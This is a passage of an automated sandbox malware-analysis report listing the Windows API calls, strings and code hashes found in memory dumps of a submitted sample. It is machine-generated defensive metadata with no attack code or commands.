                                                                                                                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00C7B546
                                                                                                                            • GetLastError.KERNEL32 ref: 00C7B550
                                                                                                                            • SetErrorMode.KERNEL32(00000000,READY), ref: 00C7B5BD
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                            • API String ID: 4194297153-14809454
                                                                                                                            • Opcode ID: d83555a324181f6c3b670a4186ecf5a6526e7e6bcb3e3d052a18b33f50cdc18f
                                                                                                                            • Instruction ID: f7f77f8eea6d9cc993c67964a98505a5c80b130b44ca8819d0a2c712fd44a18f
                                                                                                                            • Opcode Fuzzy Hash: d83555a324181f6c3b670a4186ecf5a6526e7e6bcb3e3d052a18b33f50cdc18f
                                                                                                                            • Instruction Fuzzy Hash: E6318135A00205DFCB40EBA8C895FAEBBB4FF45310F10816AE519D7291DB719E46DB91
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00C17DE1: _memmove.LIBCMT ref: 00C17E22
                                                                                                                              • Part of subcall function 00C6AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00C6AABC
                                                                                                                            • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00C69014
                                                                                                                            • GetDlgCtrlID.USER32 ref: 00C6901F
                                                                                                                            • GetParent.USER32 ref: 00C6903B
                                                                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00C6903E
                                                                                                                            • GetDlgCtrlID.USER32(?), ref: 00C69047
                                                                                                                            • GetParent.USER32(?), ref: 00C69063
                                                                                                                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 00C69066
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                            • API String ID: 1536045017-1403004172
                                                                                                                            • Opcode ID: b4dd0a8db9f05c48fb1f48d4e4d2775ccffd38ef4210aad9d8c7099498641087
                                                                                                                            • Instruction ID: a723bea567cae1e7177270bf36170ef9495c8e6ca444af4dda73f34c13240e32
                                                                                                                            • Opcode Fuzzy Hash: b4dd0a8db9f05c48fb1f48d4e4d2775ccffd38ef4210aad9d8c7099498641087
                                                                                                                            • Instruction Fuzzy Hash: 1621B674A00208BFDF15ABA0CC89FFEBB79EF49310F10025AF961972E1DB755955EA20
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00C17DE1: _memmove.LIBCMT ref: 00C17E22
                                                                                                                              • Part of subcall function 00C6AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00C6AABC
                                                                                                                            • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00C690FD
                                                                                                                            • GetDlgCtrlID.USER32 ref: 00C69108
                                                                                                                            • GetParent.USER32 ref: 00C69124
                                                                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00C69127
                                                                                                                            • GetDlgCtrlID.USER32(?), ref: 00C69130
                                                                                                                            • GetParent.USER32(?), ref: 00C6914C
                                                                                                                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 00C6914F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                            • API String ID: 1536045017-1403004172
                                                                                                                            • Opcode ID: 9b3b513228e159c794940348f3ab7852dafee22fe972cf65739c3b6d96c5e54c
                                                                                                                            • Instruction ID: 7349c9ace7cff4a8d706922f9c5dee65790b4076194d58b5eb80cdb557d80dd8
                                                                                                                            • Opcode Fuzzy Hash: 9b3b513228e159c794940348f3ab7852dafee22fe972cf65739c3b6d96c5e54c
                                                                                                                            • Instruction Fuzzy Hash: 8521C875A00208BBDF11ABA5CC89FFEBB78EF49300F10415AF521972A1DB755556EB20
                                                                                                                            APIs
                                                                                                                            • GetParent.USER32 ref: 00C6916F
                                                                                                                            • GetClassNameW.USER32(00000000,?,00000100), ref: 00C69184
                                                                                                                            • _wcscmp.LIBCMT ref: 00C69196
                                                                                                                            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00C69211
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ClassMessageNameParentSend_wcscmp
                                                                                                                            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                            • API String ID: 1704125052-3381328864
                                                                                                                            • Opcode ID: b169b09ff87918efefaddd0ad91588fbe114b670acc415dd18088aa42a60eab1
                                                                                                                            • Instruction ID: 73b12cbba52fb3ab19d472d695b414008908de2ac0db1d43ce343dbd53e08c40
                                                                                                                            • Opcode Fuzzy Hash: b169b09ff87918efefaddd0ad91588fbe114b670acc415dd18088aa42a60eab1
                                                                                                                            • Instruction Fuzzy Hash: 6F11EC36248307B9FE312665DC5BEAB379CDB15720F20013AF910E54E1FE7159516954
                                                                                                                            APIs
                                                                                                                            • VariantInit.OLEAUT32(?), ref: 00C888D7
                                                                                                                            • CoInitialize.OLE32(00000000), ref: 00C88904
                                                                                                                            • CoUninitialize.OLE32 ref: 00C8890E
                                                                                                                            • GetRunningObjectTable.OLE32(00000000,?), ref: 00C88A0E
                                                                                                                            • SetErrorMode.KERNEL32(00000001,00000029), ref: 00C88B3B
                                                                                                                            • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00CA2C0C), ref: 00C88B6F
                                                                                                                            • CoGetObject.OLE32(?,00000000,00CA2C0C,?), ref: 00C88B92
                                                                                                                            • SetErrorMode.KERNEL32(00000000), ref: 00C88BA5
                                                                                                                            • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00C88C25
                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00C88C35
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2395222682-0
                                                                                                                            • Opcode ID: 2a19107a1dcb6e46e2e1d0b1e7d344acad2b2bea2fec13092e462c24bc965721
                                                                                                                            • Instruction ID: 1da7ee4d0acd39b0a50785f9b618226117ce093f0d112deda5a96c74e1984f00
                                                                                                                            • Opcode Fuzzy Hash: 2a19107a1dcb6e46e2e1d0b1e7d344acad2b2bea2fec13092e462c24bc965721
                                                                                                                            • Instruction Fuzzy Hash: 06C135B1208305AFD700EF64C88496AB7E9FF89348F40492DF58ADB251DB71ED4ACB56
                                                                                                                            APIs
                                                                                                                            • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00C77A6C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ArraySafeVartype
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1725837607-0
                                                                                                                            • Opcode ID: e9d3d5fd500fef92ed784b02b06d26a8dd7329bc541b4138e906deb44e87e331
                                                                                                                            • Instruction ID: f0eab3af07f990f92ca3e222c12c52230230730bd28e72252d209fd2bcd38c5d
                                                                                                                            • Opcode Fuzzy Hash: e9d3d5fd500fef92ed784b02b06d26a8dd7329bc541b4138e906deb44e87e331
                                                                                                                            • Instruction Fuzzy Hash: A4B19C7190421E9FDB01DFA4C885BBEB7B8FF09321F208529E619E7251D734E941DB91
                                                                                                                            APIs
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00C711F0
                                                                                                                            • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00C70268,?,00000001), ref: 00C71204
                                                                                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 00C7120B
                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C70268,?,00000001), ref: 00C7121A
                                                                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 00C7122C
                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C70268,?,00000001), ref: 00C71245
                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C70268,?,00000001), ref: 00C71257
                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00C70268,?,00000001), ref: 00C7129C
                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00C70268,?,00000001), ref: 00C712B1
                                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00C70268,?,00000001), ref: 00C712BC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2156557900-0
                                                                                                                            • Opcode ID: 3b4664c538a4440f9f3dd0066c7cf847456dbc6f6bb05917dd7d503946f3c93c
                                                                                                                            • Instruction ID: cf1ff42b42688a4692964afbb4dc8ee27f12f0de0a8c99ae2035dc3a322c3a68
                                                                                                                            • Opcode Fuzzy Hash: 3b4664c538a4440f9f3dd0066c7cf847456dbc6f6bb05917dd7d503946f3c93c
                                                                                                                            • Instruction Fuzzy Hash: BD319E75601704FBDB209F98EC88F6D77A9EB54311F24812AFD18D61A1E7B49E40CB60
                                                                                                                            APIs
                                                                                                                            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00C1FAA6
                                                                                                                            • OleUninitialize.OLE32(?,00000000), ref: 00C1FB45
                                                                                                                            • UnregisterHotKey.USER32(?), ref: 00C1FC9C
                                                                                                                            • DestroyWindow.USER32(?), ref: 00C545D6
                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 00C5463B
                                                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00C54668
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                            • String ID: close all
                                                                                                                            • API String ID: 469580280-3243417748
                                                                                                                            • Opcode ID: a1960890d29719f0a6afb1e89efae3626d9cfbbfd82b43762f609bb341adeab7
                                                                                                                            • Instruction ID: 45110a2b7c8692468f1c28fbcda1786fb4886a03dcdda065ea19dba5093483b7
                                                                                                                            • Opcode Fuzzy Hash: a1960890d29719f0a6afb1e89efae3626d9cfbbfd82b43762f609bb341adeab7
                                                                                                                            • Instruction Fuzzy Hash: 0DA17034301212CFCB29EF14C5A4BA9F364AF06705F5442ADE80AAB251DB30ED97EF94
                                                                                                                            APIs
                                                                                                                            • EnumChildWindows.USER32(?,00C6A439), ref: 00C6A377
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ChildEnumWindows
                                                                                                                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                            • API String ID: 3555792229-1603158881
                                                                                                                            • Opcode ID: 1abcd7ebf48c09b8f299453e7bb5fcd22a6a1c91246dbbda258604561e0eba1a
                                                                                                                            • Instruction ID: 69f00f6b6ec0e988dca48dd48757d39e91680ddf1820f979eeff3de127cffd09
                                                                                                                            • Opcode Fuzzy Hash: 1abcd7ebf48c09b8f299453e7bb5fcd22a6a1c91246dbbda258604561e0eba1a
                                                                                                                            • Instruction Fuzzy Hash: FF91A571604605EACB18DFA0C492BEDFBB4FF05300F548129E85AB7251DF31AA99EF91
                                                                                                                            APIs
                                                                                                                            • SetWindowLongW.USER32(?,000000EB), ref: 00C12EAE
                                                                                                                              • Part of subcall function 00C11DB3: GetClientRect.USER32(?,?), ref: 00C11DDC
                                                                                                                              • Part of subcall function 00C11DB3: GetWindowRect.USER32(?,?), ref: 00C11E1D
                                                                                                                              • Part of subcall function 00C11DB3: ScreenToClient.USER32(?,?), ref: 00C11E45
                                                                                                                            • GetDC.USER32 ref: 00C4CD32
                                                                                                                            • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00C4CD45
                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00C4CD53
                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00C4CD68
                                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00C4CD70
                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00C4CDFB
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                            • String ID: U
                                                                                                                            • API String ID: 4009187628-3372436214
                                                                                                                            • Opcode ID: 1ff678b5cd4978a0e80e5d5a186e35560e71f9dfb276bfce5f7620c6263d2f19
                                                                                                                            • Instruction ID: b75d486d1f4763d1b9b9a19bc50e484b6d9ecd2061d27ee0c688b565afaea80e
                                                                                                                            • Opcode Fuzzy Hash: 1ff678b5cd4978a0e80e5d5a186e35560e71f9dfb276bfce5f7620c6263d2f19
                                                                                                                            • Instruction Fuzzy Hash: D771DC35901209DFCF618F64C8C4AFA3BB5FF49321F14427AED659A2B6C7318991EB60
                                                                                                                            APIs
                                                                                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C81A50
                                                                                                                            • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00C81A7C
                                                                                                                            • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00C81ABE
                                                                                                                            • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00C81AD3
                                                                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C81AE0
                                                                                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00C81B10
                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00C81B57
                                                                                                                              • Part of subcall function 00C82483: GetLastError.KERNEL32(?,?,00C81817,00000000,00000000,00000001), ref: 00C82498
                                                                                                                              • Part of subcall function 00C82483: SetEvent.KERNEL32(?,?,00C81817,00000000,00000000,00000001), ref: 00C824AD
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2603140658-3916222277
                                                                                                                            • Opcode ID: 964d9b7ee597bc0a8b6ebda61a959bd47a6ececb5a463529ce1825ee1fa48d52
                                                                                                                            • Instruction ID: 179d34ecd63109467328b0f88275207c5798fadfadbe8bf6436909d2546c89ce
                                                                                                                            • Opcode Fuzzy Hash: 964d9b7ee597bc0a8b6ebda61a959bd47a6ececb5a463529ce1825ee1fa48d52
                                                                                                                            • Instruction Fuzzy Hash: C9414CB1501218BFEB15AF51CC89FFF7BACEB08358F04412AFD159A141E7709E469BA8
                                                                                                                            APIs
                                                                                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00C9F910), ref: 00C88D28
                                                                                                                            • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00C9F910), ref: 00C88D5C
                                                                                                                            • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00C88ED6
                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 00C88F00
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 560350794-0
                                                                                                                            • Opcode ID: 5bb36202bb4ce0702141d4966ca857937a625c7ff16e7bb3a8de8d51225810b7
                                                                                                                            • Instruction ID: 56d659fd501a70e7f07a78a61ad3d5e333917f8c48def7d2c73951c566f49e5f
                                                                                                                            • Opcode Fuzzy Hash: 5bb36202bb4ce0702141d4966ca857937a625c7ff16e7bb3a8de8d51225810b7
                                                                                                                            • Instruction Fuzzy Hash: 4CF15B71A00209EFCF14EF94C888EAEB7B9FF49318F148458F915AB251DB31AE46DB54
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 00C8F6B5
                                                                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00C8F848
                                                                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00C8F86C
                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00C8F8AC
                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00C8F8CE
                                                                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00C8FA4A
                                                                                                                            • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00C8FA7C
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00C8FAAB
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00C8FB22
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
